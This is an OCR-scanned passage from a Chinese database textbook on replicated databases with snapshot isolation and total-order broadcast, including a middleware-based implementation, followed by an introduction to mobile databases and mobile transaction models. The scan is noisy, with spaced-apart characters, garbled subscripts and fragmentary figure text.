e 每 个 结 点 必须 以 相同 的 次 序 接收 C 和 C:， 比 如 Ci 一 Cz。 

。 假设 C, 确认 无 冲突 , 原本 在 工作 空间 执行 的 所 有 修改 最 终 在 $1 写 和 人， 其 他 结 点 也 根 

据 发 来 的 Ci 中 的 信息 使 写 集 合 产生 作用 。 

e 此 时 车 C: 与 Ci 冲突 。 撤 销 Ci 是 不 可 能 的 ， 因 此 撤销 C; 是 唯一 的 选择 。 

这 样 做 能 行 是 因为 所 有 结 点 都 会 在 确认 C; 之 前 确认 C， 并 且 它 们 会 以 统一 顺序 处 理 
写 操 作 ， 因 此 冲突 会 在 每 一 结 点 存在 ， 所 有 结 点 一 定 都 会 撤销 C:。 也 存在 一 个 例外 。 在 上 
面 的 第 4 步 ， 我 们 说 处 理 Cs 时 发 现 与 Ci 冲突 ,但 并 未 考虑 S: 已 处 理 完事 务 。 其 实 S: 广 
播 完 Cs 后 ， 它 在 确认 Ci 时 就 已 经 发 现 冲突 ， 此 时 其 他 结 点 还 未 见 到 C*。 这 使 得 S; 在 确 
认 Ci 的 过 程 中 决定 撤销 掉 发 出 验证 请 求 C; 的 本 地 事务 并 简单 地 丢弃 按 全 序 接受 到 的 C， 
。 当 然 ， 这 要 求 在 每 个 结 点 有 另外 一 些 登 记 ( 例 如， 每 个 结 点 必须 有 日 志 记录 验证 请 求 何 
时 送出 、 何 时 收 到 ) 和 唯一 验证 请 求 标志 ， 但 这 并 不 影响 事务 本 地 处 理 ， 仅 针对 验证 。 这 
类 验证 称 为 向 后 的 (Haerder, 1984) ， 因 为 确认 时 仅 考虑 最 近 交 付 的 状态 。 其 对 应 的 向 前 验 
证 ， 意 味 着 验证 还 要 考虑 哪些 并 发 运行 着 的 事务 读 了 哪些 数据 ， 也 就 是 读 写 冲 突 ， 这 在 SI 
中 不 予 考虑 。 
排序 锁 获 取 

排序 锁 获 取 可 与 这 种 技术 联 用 ， 因 为 提交 的 验证 请 求 中 带 着 写 集 合 ， 因 此 每 个 结 点 都 可 
得 知 。 
投票 阶段 

在 叙述 前 一 项 技术 时 ， 我 们 谈 到 若 每 个 结 点 都 处 理 读 操作 ， 省 略 投票 阶段 的 可 能 性 。 在 
此 情形 下 ， 较 弱 隔 离 级 SI 可 补救 这 个 问题 。 可 是 还 有 另外 的 原因 使 得 最 后 的 投票 阶段 或 至 
少 是 一 个 应 答 阶段 是 必要 的 。 在 前 一 技术 中 ,我 们 未 考虑 结 点 处 理 操 作 的 性 能 可 能 不 同 ， 这 
意味 着 一 个 客户 端 不 得 不 等 最 慢 的 那个 。 然 而 ， 我 们 说 过 ， 若 一 个 本 地 结 点 能 本 地 提交 事 
务 ， 它 就 能 假设 所 有 无 故障 的 结 点 都 会 有 相同 的 结果 。 在 前 一 技术 中 ， 该 假设 成 立 是 因为 每 
个 操作 被 分 别 地 传播 。 然 而 ， 此 时 需 考虑 会 话 一 致 性 。 假 若 一 个 验证 和 后 续 的 写 集 合 安装 已 
在 结 点 S; 上 完成 , 但 未 在 S 上 完成 ， 而 客户 从 S$, 再 读 前 面 已 修改 的 数据 ， 则 不 能 保证 会 话 
一 致 性 。 注 意 ， 读 并 未 被 阻塞 。 有 两 种 解决 办 法 : 

e 不 理会 SI 读 写 从 不 冲突 的 约定 ， 任 何 对 正 验证 数据 的 读 都 禁止 ， 读 数据 须 等 到 验证 
完成 之 后 。 
结 点 完成 验证 阶段 后 都 须 做 出 回答 ， 本 地 结 点 仅 当 所 有 非 故 障 结 点 都 送出 它们 的 回 
答 后 才 响应 客户 。 

从 不 阻塞 读 这 条 性 质 的 有 用 之 处 在 于 ， 它 减少 了 结 点 之 间 用 固定 和 组 通信 全 序 方式 交换 
写 集合 的 工作 。 这 会 大 大 减少 消息 开销 和 建立 全 序 的 开销 。 验证 的 缺点 是 ， 它 必须 作为 一 
个 原子 部 分 执行 ， 虽 然 这 并 没什么 。 没 有 全 局 死 锁 是 使 其 成 为 具有 吸引 力 的 技术 的 另 一 条 有 
用 性 质 。 
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与 上 一 种 方法 在 执行 读 写 操作 的 过 程 中 检查 冲突 相 比 ， 这 种 技术 是 在 验证 时 发 现 冲 突 。 
验证 属 乐观 策略 ， 当 修改 比率 不 大 时 能 有 效 地 工作 。 若 修改 比率 大 ， 撤 销 比 率 也 将 随 之 增 
加 。 而 锁 协议 ， 比 如 2PL 即使 对 于 高 修改 率 的 情形 ， 也 能 提供 非常 稳定 的 提交 率 。 

从 应 用 的 角度 看 ， 该 模式 也 极 具 吸引 力 ， 特 别 是 对 于 那些 不 连通 〈 移 动 、 松 耦合 和 面向 
服务 的 ) 计算 ， 这 样 的 应 用 中 客户 一 般 读 完 数据 后 断 开 连接 ， 离 线 进 行 修改 ， 最 后 再 用 改变 
集 的 形式 将 拟 做 修改 返回 给 数据 库 (或 中 间 件 )。 它 们 用 不 同 的 事务 读 、 写 数据 ， 也 就 是 说 
读 和 写 是 分 离 的。 这 条 性 质 能 用 于 简化 事务 的 显示 标记 。 要 肯定 该 模式 的 现实 可 行 性 ， 可 考 
察 Postgres-R 系统 ( Postgres-R 是 扩展 的 关系 数据 库 系 统 ，Postgres 提供 高 效 、 快 速 并 一 致 
的 数据 库 复 制 )。 

关于 一 致 性 ， 该 模式 能 保证 SI。 至 于 消息 开销 ， 对 于 单个 事务 ， 每 条 消息 都 通过 组 通 
信和 层 送 给 所 有 结 点 ， 包 括 发 出 广播 的 这 个 结 点 本 身 ， 也 就 是 ， 每 次 交互 条 消息 ， 关 于 回 
答 有 2n 条 消息 (n 次 修改 传播 和 nn 个 回答 )， 最 后 投票 有 3n 条 消息 (n 次 修改 传播 、n 次 准 
备 和 nn 个 投票 )。 这 个 模式 主要 的 缺点 是 延迟 的 冲突 检测 和 本 地 事务 撤销 率 高 。 该 模式 的 优 
点 是 : 

读 与 写 不 冲突 ， 反 之 亦 真 。 

无 单 点 失效 结 点 ， 使 恢复 更 容易 。 

允许 在 任 一 结 点 即时 地 交互 ， 即 使 没有 全 局 的 死 锁 检测 。 
比 前 一 模式 减少 了 消息 开销 。 

e 组 通信 减弱 了 可 靠 性 、 执 行 顺序 与 并 发 控制 协议 之 间 的 联系 。 
基于 中 间 件 的 实现 

对 于 前 述 带 SI 和 统一 全 序 广播 的 ROWA 方法 ， 本 小 节 给 出 一 种 基于 中 间 件 的 实现 。 
我 们 讨论 分 散 的 中 间 件 方法 ， 即 数据 库 与 中 间 件 构成 一 个 复制 单元 ( 见 图 26-4 ) 。 我 们 从 
图 26-17 所 给 例子 开始 讨论 。 在 基于 中 间 件 的 实现 中 ， 客 户 总 是 首先 连接 中 间 件 ， 开 始 事 
务 。 中 间 件 则 给 该 事务 打上 一 个 新 的 时 间 戳 ， 然 而 传送 读 操作 给 数据 库 。 事 务 读 该 数据 库 上 
的 快照 并 在 其 工作 空间 继续 处 理 。 所 有 的 操作 都 传送 给 数据 库 ， 结 果 送 回 给 中 间 件 。 在 本 例 
中 ,事务 T 和 T: 运行 在 复制 单元 RU 上 ， 而 事务 T3 和 T4 运行 在 RU: 上 。T4 是 个 只 读 事 
务 ，T 写 x，T: 和 Ts 写 y， 最 终 T: 和 Ts 互相 冲突 。 

如 图 显示 的 那样 ， 对 于 写 操作 在 中 间 件 和 数据 库 之 间 总 是 有 一 个 来 回 的 消息 。 对 于 读 操 
作 ， 数据 库 就 把 当前 的 快照 提供 给 中 间 件 ， 中 间 件 再 转 给 客户 (如 果 有 和 需要， 中 间 件 甚至 能 
记录 下 该 读 操作 )。Ti 是 第 一 个 终止 的 事务 。 中 间 件 首先 问 数据 库 要 写 集合 ， 并 通过 组 通信 
层 用 统一 完全 序 广播 将 该 写 集合 告知 RU 和 它 自 己 。 也 就 是 说 ， 每 个 RU (包括 广播 的 那个 ) 
都 以 同样 的 顺序 接收 到 写 集合 。 中 间 件 一 旦 接收 到 一 个 写 集合 ， 它 立即 验证 该 写 集合 与 正在 
并 行 交付 的 写 集合 是 否 有 交集 。 由 于 没有 其 他 事务 并 行 地 修改 x，T 被 允许 交付 。 验 证 作为 
一 个 原子 部 分 执行 。 

Ts 是 在 RU: 上 终止 的 下 一 个 事务 。 由 于 T4 为 上 只 读 事 务 ， 它 能 立即 交付 。 接 下 来 , T; 在 
RU: 上 终止 。RU: 的 中 间 件 (MW, ) 请 求 写 集合 并 通过 组 通信 层 广播 给 MW 和 自己 。T2 和 
T; 都 修改 了 y， 但 验证 只 针对 最 近 交 付 的 状态 并 且 没有 其 他 事务 修改 过 y，T; 的 修改 仍 被 隔 
离 着 。 最 后 ，T: 终止 并 且 验 证 失败 ， 原 因 是 T: 并 行 地 修改 了 y。 

上 一 节 讨 论 该 模式 和 技术 时 虽 未 明显 提 到 实现 的 问题 ， 但 实际 上 更 多 是 从 基于 核实 现 的 
角度 考虑 的 。 本 小 节 我 们 对 比 了 基于 中 间 件 的 实现 与 基于 核 的 实现 。 一 方面 ， 额 外 一 个 中 间 
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件 层 会 引发 更 多 来 回 消息 ， 但 与 基于 核 的 实现 相 比 这 个 缺点 可 忽略 。 另 一 方面 。 中 间 件 被 合 
适 地 部 署 在 异 构 环 境 ， 它 要 求 数据 库 API 与 中 间 件 之 间 映 射 。 

为 了 使 验证 能 在 中 间 件 层 完成 ， 每 个 中 间 件 都 必须 维持 所 有 写 集合 。 事 务 的 私有 空间 也 
不 得 不 由 中 间 件 这 层 来 提供 。 由 于 读 和 写 都 必须 通过 中 间 件 这 层 ， 所 以 这 也 不 增加 另外 的 开 
销 。 本 例 中 未 考虑 RU' 在 验证 T: 时 就 撤销 Tz。 然 而 ， 这 是 可 能 的 ， 因 为 MW' 能 用 日 志 记 
录 T: 的 所 有 写 操作 。 在 本 例 中 ， 事 务 交付 的 例子 也 基于 这 样 一 个 假设 ， 即 在 两 个 RU 上 的 
验证 有 相同 的 结论 。 前 一 节 曾 提 到 过 ， 这 样 的 假设 会 导致 竞争 条 件 ， 如 果 验 证 在 一 个 结 点 正 
进行 着 ， 客 户 又 从 该 结 点 再 读数 据 。 基 于 中 间 件 的 实现 也 需 处 理 同样 的 问题 ， 只 有 最 终 的 回 
答 阶段 能 保证 会 话 一 致 性 。 

基于 分 散 的 中 间 件 实现 比 集中 的 更 可 靠 ， 因 为 不 存在 瓶 贷 ,但 基于 集中 中 间 件 的 实现 要 
求 的 消息 更 少 一 些 。 此 时 复制 模式 可 能 是 一 种 折 中 。 在 复制 中 间 件 的 方法 ( 见 图 26-4 ) 中 ， 
中 间 件 有 个 专门 的 备份 ， 在 客户 事务 范围 内 ， 所 有 信息 (如 时 间 惟 、 事 务 标识 、 读 集合 与 写 
集合 ) 都 以 积极 的 方式 传 到 该 备份 中 。 男 一 种 可 能 是 在 这 些 实例 间 用 主动 副本 。 


复制 单元 1 复制 单元 2 
Si MW MW Saz 


1 





4—— Wi(x) wey) 一 一 人 


Ti 开始 TS-0 ”了 开始 Ts-i 





= 


Ts 开始 TS=4 


r(x) —— 


== OK 


确认 
作用 WS 一 » 
4—— OK i— w(x) 
commit; 一 上 





-== OK 
commitse—* 
取 WS; 一 > 


条 WS 


确认 


commits —p 


图 26-17 SI 和 统一 完全 广播 复制 的 基于 中 间 件 的 实现 


至 于 消息 开销 ， 对 于 单个 事务 ， 每 条 消息 都 通过 组 通信 层 送 到 其 他 结 点 ， 包 括 广 播 的 这 
个 结 点 本 身 ， 也 就 是 ， 每 次 交互 n 条 消息 。 而 中 间 件 与 数据 库 之 间 的 交互 ， 对 于 一 个 修改 操 
作 需 两 条 消息 ， 取 其 写 集合 需 两 条 消息 ， 提 交 该 修改 需 两 条 消息 。 回 答 需要 2n+6m 条 消息 
(m 次 修改 *6，n 次 修改 传播 和 nn 次 回答 )， 投票 需要 3n+6m 条 消息 (m 次 修改 *6，n 次 修改 
传播 ，n 次 准备 和 nn 个 投票 )。 这 个 模式 主要 的 缺点 是 : 

。 延迟 的 冲突 检测 和 本 地 事务 高 撤销 率 。 

e 排序 消息 的 开销 。 
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。 中 间 件 层 引 起 的 额外 开销 。 

该 模式 的 优点 有 : 

。 比 基 于 集中 式 中 间 件 方法 容错 能 力 更 强 。 

e 读 与 写 不 冲突 ， 反 之 亦 真 。 

e 无 单 点 失效 站 点 ， 使 恢复 更 容易 。 

e 允许 在 任 一 结 点 即时 地 交互 ， 即 使 没有 全 局 的 死 锁 检测 ; 


26.4 ”移动 数据 库 简介 


我 们 亲眼 看 到 ， 越 来 越 多 的 移动 工作 者 和 终端 用 户 对 移动 计算 的 支持 类 型 提出 了 更 高 的 
要 求 ， 例 如 ， 和 希望 有 移动 顾客 关系 管理 (CRM) 或 销售 自动 化 (SFA)。 他 们 期 望 即 使 在 外 面 
工作 ， 包 括 在 家 中 、 在 客户 要 求 的 地 方 或 去 远方 的 路 上 ， 都 要 能 像 在 办 公 室 工 作 一 样 。 此 时 
的 “办 公 室 ” 可 能 为 远程 工作 者 就 配备 了 一 台 笔 记 本 、 智 能 手机 、 平 板 电脑 或 其 他 Internet 
访问 设备 。 随 着 蜂窝 通信 、 无 线 通信 和 卫星 通信 的 快速 扩展 ， 移 动用 户 可 以 在 任何 时 候 、 任 
何 地 方 访问 任何 数据 。 按 Cisco 全 球 移动 数据 业务 预测 ( Cisco, 2012 )，2011 年 至 2016 年 
间 全 球 移动 数据 业务 将 翻 18 番 。2011 年 到 2016 年 ， 移 动 数 据 业 务 将 以 78% 复合 年 增长 率 
(CAGR) 增长 ， 到 2016 年 每 月 达到 10.8EB ( 108 字 节 )。2012 年 末 ， 移动 连接 设备 已 超过 
地 球 上 人 的 数目 ， 到 2016 年 人 均 达 到 1.4 个 。2016 年 将 有 100 亿 个 移动 连接 设备 ， 包 括 机 
器 到 机 器 (M2M) 的 模块 ， 超 过 那 时 的 人 口 总 量 (73 亿 )。 

但 是 ， 商业 约 束 、 实 用 性 、 安 全 性 和 实现 成 本 等 因素 仍然 制约 着 通信 ， 所 以 用 户 不 可 能 
在 任何 需要 的 时 候 都 建立 连接 。 移 动 数 据 库 则 为 这 些 限制 提供 了 一 种 解决 方案 。 


移动 数据 库 | 凡是 便 扒 式 的 、 与 公共 数据 库 服务 器 物理 分 离 ， 但 却 能 从 远程 结 点 与 公共 数 
据 库 服务 器 保持 通信 ， 支 持 共享 公共 数据 的 数据 库 都 称 为 移动 数据 库 。 


考虑 DreamHome, 移动 的 销售 员 可 能 需要 私房 和 公房 (就 是 公司 ) 业主 的 信息 以 及 这 些 
房屋 的 租 客 和 订单 的 关键 信息 。 坐 镇 分 公司 的 那些 同事 也 需要 某 些 同样 的 数据 : 市 场 部 门 需 
要 客户 信息 ， 金 融 部 门 需要 订单 信息 等 。DreamHome 可 能 还 有 个 到 处 跑 的 维修 队 ， 它 每 天 
早上 拿 到 维修 单 ， 开 车 到 不 同 的 出 租房 进行 维修 。 维 修 队 需 要 知道 将 拜访 的 租 客 以 及 要 维修 
内 容 等 信息 。 他 们 还 需 记 录 下 他 们 做 了 什么 , 用 了 什么 材料 ， 花 了 多 少 工时 ， 后 面 还 有 那些 
事 需要 做 等 。 

通过 移动 数据 库 ， 用 户 可 以 通过 他 们 的 便携 式 电脑 、 智 能 手机 或 其 他 Internet 访问 设备 ， 
访问 在 远程 结 点 应 用 程序 中 要 求 的 公共 数据 。 典 型 的 移动 数据 库 环境 体系 结构 如 图 26-18 所 
示 。 移 动 数据 库 环境 包括 的 元 素 有 : 

e 公共 数据 库 服 务 器 以 及 管理 、 存 储 公共 数据 ， 提 供 公共 应 用 的 DBMS。 

e 远程 数据 库 以 及 管理 、 存 储 移动 数据 ， 提 供 移动 应 用 的 DBMS。 

e 移动 数据 库 平 台 ， 包 括 手提 电脑 、 智 能 手机 和 其 他 Internet 访问 设备 。 

e 公共 DBMS 与 移动 DBMS 之 间 的 双向 通信 链 路 。 

根据 移动 应 用 的 特殊 需要 ， 一 些 移 动用 户 可 能 要 登录 到 公共 数据 库 服务 器 直接 操作 数 
据 。 而 另 一 些 用 户 可 能 会 下 载 数据 到 移动 设备 上 使 用 ， 或 者 向 公共 数据 库 上 传 在 远程 结 点 捕 
捉 到 的 数据 。 

在 公共 数据 库 和 移动 数据 库 之 间 的 通信 经 常 是 断断续续 的 ， 而 且 通 信 建 立 的 间隔 时 间 也 
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并 不 规则 。 虽 不 常见 ， 还 是 有 些 应 用 程序 甚至 要 求 在 移动 数据 库 之 间 建 立 直接 通信 。 移 动 数 
据 库 主要 包含 两 个 主要 问题 : 一 是 移动 数据 库 的 管理 ， 另 外 一 个 是 移动 数据 库 与 公共 数据 库 
之 间 的 通信 。 在 接 下 来 的 小 节 中 将 讨论 移动 DBMS 的 需求 。 





终端 
用 户 
通信 和 链 路 
终端 
用 户 
移动 数据 库 
应 用 


图 26-18 移动 数据 库 环境 的 典型 结构 


26.4.1 移动 DBMS 


所 有 主要 的 DBMS 供应 商都 提供 移动 DBMS 方案 或 能 访问 其 DBMS 的 中 间 件 解决 方 
案 。 事 实 上 ， 移动 数据 库 的 发 展 也 成 为 推动 各 主要 DBMS 供应 商 销 售 不 断 增长 的 重要 因素 
之 一 。 大 部 分 供应 商 改进 他 们 的 移动 DBMS， 使 得 其 具有 与 一 定 范围 之 内 的 关系 数据 库 通信 
的 能 力 ， 同 时 提供 只 需 有 限 计算 资源 的 数据 库 服务 来 满足 当前 的 移动 设备 。 移 动 DBMS 需 
要 的 附加 功能 包括 : 

e 通过 无 线 或 Internet 等 方式 和 企业 数据 库 服务 器 通信 。 

e 在 企业 数据 库 服 务 器 和 移动 设备 上 复制 数据 ( 见 26.2 和 26.3 节 )。 

在 企业 数据 库 服 务 器 和 移动 设备 上 同步 数据 ( 见 26.2 和 26.3 节 )。 
从 不 同 的 资源 中 ， 比 如 Internet 上 获得 数据 。 

在 移动 设备 上 管理 数据 。 

在 移动 设备 上 分 析 数 据 。 

创建 定制 的 移动 应 用 。 

DBMS 供应 商 正在 逐步 调整 划分 到 每 个 用 户 的 价格 ， 这 样 ， 对 于 一 个 组 织 机 构 来 说 ， 将 
那些 原本 只 能 在 室内 运行 的 应 用 扩展 到 移动 设备 也 是 划算 的 。 当 前 大 部 分 移动 DBMS 只 支 
持 打包 好 的 SQL 功能 ， 而 不 支持 其 他 扩展 的 数据 库 查询 或 数据 分 析 功 能 。 但 是 ， 在 不 久 的 
将 来 ， 移 动 设备 提供 的 功能 将 至 少 与 公共 结 点 提供 的 功能 相 匹 配 。 


26.4.2 与 移动 DBMS 相关 的 问题 


在 讨论 那些 与 移动 数据 库 应 用 有 关 的 问题 之 前 ， 我 们 先 给 出 一 个 简要 的 移动 环境 构成 。 
图 26-19 显示 了 一 种 由 若干 移动 设备 构成 的 移动 环境 ,通常 称 这 些 设备 为 移动 主机 
(Mobile Hosts，MH) 或 移动 单元 , 它们 能 通过 无 线 连 接连 入 一 个 固定 的 计算 机 有 线 网 络 。 移 
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动 主机 与 有 线 网 络 之 间 的 通信 通过 称 之 为 移动 支持 站 ( Mobile Support Stations，MSS) 或 基 
站 的 计算 机 完成 ， 这 些 计算 机 能 连接 移动 主机 并 提供 移动 界面 。 有 线 网 中 也 有 若干 固定 主机 
(Fixed Hosts，FH)， 它 们 通常 不 用 于 管理 移动 主机 。 一 个 移动 支持 站 能 管理 在 它 蜂 帘 (cell) 
内 的 移动 主机 ， 一 般 对 应 着 地 理 区 域 。 移动 主机 可 能 从 一 个 蜂 窗 移动 到 另 一 个 蜂窝 ， 这 要 
求 对 其 控制 也 能 从 一 个 移动 支持 站 转向 另 一 个 。 由 于 移动 主机 有 时 也 可 能 没 电 了 ， 那 么 移动 
主机 就 可 能 脱离 蜂窝 ， 随 后 在 某 个 蜂窝 (可 能 与 前 不 同 ) 中 再 次 出 现 。 有 时 移动 主机 之 间 也 
可 能 直接 通信 ， 而 不 通过 移动 支持 站 ， 但 这 一 般 仅 能 发 生 在 邻近 的 主机 之 间 。 在 图 24.4 曾 
给 出 DBMS 集成 方案 的 一 种 分 类 。 当 把 移动 环境 列 人 固定 网 络 ， 即 视 作 分 布 式 系统 后 ， 可 
在 分 布 式 轴 上 加 一 个 点 ， 扩 展 该 分 类 以 包括 移动 DBMS， 如 图 26-20 所 示 。 
蜂窝 间 移 动 
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图 26-19 ”移动 计算 体系 结构 
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移动 异 构 DBMS 
自治 


异 构 MDBS 










集中 式 DBMS 异 构 MDBS 


异 构 
图 26-20 扩展 DBMS 集成 方案 分 类 


本 节 一 开始 就 给 出 了 DreamHome 移动 应 用 的 两 个 例子 : 移动 销售 和 移动 维修 。 一 种 可 
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能 的 解决 方案 是 让 移动 的 工作 队 像 在 办 公 室 里 一 样 地 访问 企业 数据 库 ， 例 如 采用 传统 的 客户 
/ 服务 器 结构 ， 在 企业 数据 库 服 务 器 上 检索 和 修改 数据 。 但 这 将 引发 多 个 问题 : 
e 无 线 通 信 的 带宽 太 低 。 
_@ 有 许多 区 域 无 线 连接 不 可 行 。 
e 无 线 连接 可 能 不 可 靠 ， 特 别 当 用 户 在 连续 移动 时 (这 可 能 导致 数据 丢失 或 数据 完整 
性 丢失 )。 
在 无 线 WAN 上 传输 大 量 数据 非常 昂贵 。 
保密 性 可 能 成 问题 (例如 ， 移 动 主机 可 能 被 偷 )。 
移动 设备 能 源 有 限 (也 就 是 电池 能 量 有 限 )。 
大 规模 移动 用 户 将 使 服务 器 负载 过 高 ， 这 可 能 导致 性 能 问题 。 
检索 起 来 将 比 数据 存在 本 地 (移动 ) 设备 上 慢 得 多 。 
移动 主机 不 是 静止 不 动 的 ， 它 会 从 一 个 蜂窝 移 到 另 一 个 蜂窝 ， 这 使 识别 更 困难 。 一 
种 可 选 的 方案 是 在 移动 设备 上 存储 一 个 数据 子 集 。 例 如 ， 可 将 移动 工作 者 需要 的 所 
有 数据 存 人 一 个 扁平 文件 ， 再 将 该 文件 下 载 到 移动 设备 上 。 当 然 ， 我 们 知道 用 扁平 
文件 也 会 带 来 问题 。 
e 如 果 文 件 为 有 序 的 ， 插 入 、 更 新 和 删除 数据 时 文件 可 能 不 得 不 再 排序 ， 这 十 分 耗 时 。 
。 搜索 可 能 较 慢 ， 特 别 是 文件 结构 为 顺序 的 且 规 模 很 大 时 。 
e 如 果 扁 平 文件 和 企业 数据 库 都 能 修改 ， 它 们 之 间 很 难 同步 。 
另 一 方面 ， 正 像 本 章 讨论 的 那样 ， 各 DBMS 都 提供 了 复制 方案 ， 并 通过 冲突 检测 与 解 
决 机 制 支持 多 个 结 点 修改 复制 的 数据 ( 见 26.3.4 节 )。 因 此 ,一 种 可 选 的 方案 就 是 在 移动 设 
备 上 安装 一 个 数据 库 和 DBMS， 它 定期 与 企业 数据 库 同 步 。 还 用 我 们 早先 的 例子 ， 那 么 解决 
方案 是 : 
e 移动 销售 人 员 每 天 早晨 在 家 或 酒店 用 Internet 连接 同步 他 或 她 的 客户 数据 。 任 何 进入 
本 移动 设备 的 新 订单 能 被 下 载 并 与 企业 数据 库 同 步 。 与 此 同时 ， 关 于 客户 、 房 产 等 
的 修改 信息 被 上 传 到 移动 数据 库 中 。 

e 而 移动 维修 队 则 能 在 一 天 内 任何 时 候 准 备 离开 大 本 营 前 ， 利 用 驻地 Wi-Fi 同步 他 们 
需要 去 维修 房屋 的 列表 ， 并 在 晚上 返回 后 将 他 们 都 做 了 什么 、 用 了 哪些 材料 以 及 各 
种 善后 事宜 等 详情 上 载 到 企业 数据 库 中 。 

诚然 ， 我 们 已 讨论 的 复制 机 制 只 提供 了 部 分 解决 方案 ， 还 有 若干 与 移动 环境 相关 的 问题 
需要 考虑 。 谈 到 移动 DBMS ， 就 有 方方面面 需要 提 及 ， 比 如 , DBMS 一 定 会 有 个 小 的 映像 运 
行 在 某 个 (小 的 ) 移动 设备 上 ， 它 应 能 对 付 内 存 、 磁 盘 和 处 理 器 的 限制 。 然 而 在 这 ， 我 们 简 
要 考虑 安全 、 事 务 和 查询 处 理 这 三 个 具体 问题 。 

安全 性 ”在 办 公 环 境 下 ， 数 据 库 驻 留 在 组 织 机 构 内 部 的 服务 器 上 ， 本 身 就 提供 了 一 定 程 
度 的 安全 性 。 而 在 移动 环境 下 ， 数 据 明 显 脱 离 了 安全 环境 ， 必 须 特 别 考虑 数据 保密 和 数据 
跨 无 线 网 络 传输 时 的 安全 。 显 然 ， 那些 对 于 移动 工作 者 执行 其 任务 并 非 必 不 可 少 的 数据 不 应 
该 存储 在 移动 设备 上 。 进 而 ， 第 20 章 讨论 过 的 那些 数据 安全 和 系统 安全 机 制 也 很 重要 ， 还 
有 一 招 就 是 加 密 基 础 数据 。 

事务 在 第 22 章 我 们 把 事务 既 视 为 并 发 控制 的 基本 单位 ， 又 视 为 恢复 控制 的 基本 单位 ， 
通常 具有 所 谓 ACID 四 条 性 质 ， 即 原子 性 、 一 致 性 、 隔 离 性 和 持久 性 。 

关于 ACID 的 问题 虽然 ACID 事务 在 各 个 关系 DBMS 中 都 非常 成 功 ， 但 在 移动 应 用 
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中 并 不 总 是 令 人 满意 。 在 移动 环境 下 管理 事务 要 基于 复制 、 骨 套 和 多 级 事务 的 概念 〈 见 22.4 
节 )。 同 样 地 ， 移 动 事务 模型 也 对 ACID 性 质 进行 了 放松 和 更 改 : 
e 原子 性 。 尽 管 无 线 Internet 连接 具有 高 可 用 性 ， 应 用 还 是 应 该 提醒 其 用 户 ， 无 须 为 了 
同步 修改 而 一 直 处 于 连接 状态 工作 。 这 样 一 来 ， 导 致 大 量 工作 在 本 地 很 快 完 成 。 到 
与 企业 数据 库 同步 那 一 刻 ， 不 一 定 所 有 修改 都 能 被 接受 。 回 滚 整个 工作 尽管 能 维持 
原子 性 ， 但 并 不 是 一 个 可 接受 的 方案 。 要 求 有 一 个 灵活 的 错误 处 理 机 制 ， 人 允许 通 过 
抵消 事务 部 分 回 滚 ( 见 22.4.2 节 )。 
例如 ， 在 DreamHome 中 , 一 个 工作 者 在 乡下 收集 到 有 关上 房屋 的 重要 信息 。 一 回 到 格拉 
斯 哥 ， 他 立即 要 与 企业 DBMS 同步 新 信息 。 不 是 把 这 条 工作 流 的 所 有 修改 处 理 为 一 个 事务 ， 
而 是 把 该 条 工作 流 按 其 任务 分 为 几 个 事务 。 这 使 得 系统 只 需 重 做 与 企业 数据 库 同步 失败 的 任 
务 。 这 也 允许 部 分 安装 更 新 。 主 结 点 的 角色 随 任务 改变 ( 见 26.2.5 节 的 “工作 流 所 有 权 ”)。 
e 一 致 性 。 本 地 数据 可 能 变 得 不 一 致 ， 但 移动 主机 需 等 到 下 次 连接 网 络 时 才 会 发 现 。 
类 似 地 ， 作 用 在 本 地 数据 库 上 的 修改 也 只 有 等 到 下 次 连接 时 才能 传播 。 
移动 应 用 经 常 包含 时 序数 据 完 整 性 ( temporal data integrity) 约束 。 由 于 违反 了 一 个 无 
关 紧 要 的 数据 完整 性 约束 就 回 滚 一 个 长 时 间 运 行 的 事务 是 否 合适 值得 怀疑 。 区 分 完整 约束 条 
件 的 重要 性 是 有 益 的 。 仅 当 重 要 的 约束 违反 时 才 应 该 撤销 事务 。 另 一 类 重要 的 数据 完整 性 约 
束 是 关乎 某 个 产品 可 用 性 的 。 例 如 ， 考 虑 一 个 订 票 的 移动 应 用 。 假 设 票 是 有 限 的 ， 一 位 顾客 
要 订 几 张 票 ， 可 就 在 实施 过 程 中 连接 临时 断 开 。 几 分 钟 后 又 重新 连接 上 ， 该 顾客 要 提交 订 
单 。 可 是 就 在 这 期 间 ， 其 他 顾客 把 票 全 买 走 了 。 为 了 避免 顾客 受 此 挫败 ， 最 好 是 不 告知 票 的 
情况 给 其 他 顾客 ， 至 少 在 一 定时 间 间 隔 内 。 例 如 ， 在 基于 谓词 控制 数据 陈旧 性 。 扩 展 时 间或 
位 置 维度 限制 〈( 见 26.3.2 节 )。 
e 隔离 性 。 事 务 阻塞 其 他 事务 的 可 能 性 随 着 其 期 限 的 加 长 而 增加 。 如 果 因 为 连接 断 开 
而 不 能 释放 资源 ， 情 形 更 复杂 。 此 时 采用 一 种 放松 但 仍 受 控 的 隔离 可 能 更 有 利 ， 即 
允许 其 他 事务 读 ， 实 际 也 能 修改 。 一 般 来 说 ， 就 隔离 而 言 ， 移 动 应 用 选用 更 合作 的 
事务 模型 有 好 处 。 
持久 性 。 关 于 恢复 和 容错 ， 移 动 主机 必须 能 处 理 结 点 、 介 质 、 事 务 和 通信 等 各 种 
故障 。 例 如 ， 在 一 个 未 连 入 网 络 的 移动 主机 上 所 做 的 更 新 ,， 若 该 设备 发 生 了 介质 故 
障 就 可 能 丢失 。 虽 然 有 若干 种 传统 的 机 制 处 理 恢复 问题 (集中 式 系 统 的 恢复 讨论 见 
22.3 节 ， 分 布 式 系 统 的 恢复 见 25.4 节 )， 但 它们 可 能 因为 前 面 讨论 到 的 移动 主机 的 各 
种 限制 而 不 宜 使 用 。 进 而 不 连通 性 还 带 来 问题 。 例 如 ， 移 动 设备 为 了 省 电 可 能 主动 
关机 ， 这 时 不 应 该 视 作 系统 故障 。 
表 26-1 概述 了 经 典 (固定 ) 数据 库 应 用 与 移动 数据 库 应 用 的 差别 。 
与 嵌 套 事务 有 关 的 问题 “移动 事务 模型 基于 如 下 特性 而 变化 : 
@ 封闭 与 开放 。 子 事务 的 结果 仅 对 父 事务 可 见 还 是 对 所 有 事务 可 见 ? 
e 必 不 可 少 与 可 有 可 无 。 父 事务 的 提交 是 否 依赖 于 子 事务 ? 
e 依赖 与 独立 。 子 事务 的 提交 依赖 父 事务 吗 ? 
e@ 可 替换 与 不 可 替换 。 存 在 可 替换 事务 吗 ? 
e@ 可 补偿 与 不 可 补偿 。 事 务 结果 语义 上 可 回 退 吗 ? 
蜂窝 迁移 ”由 于 移动 和 蜂窝 网 络 的 原因 ， 事务 不 得 不 从 一 个 蜂 窜 迁 到 男 一 蜂窝 。 这 条 
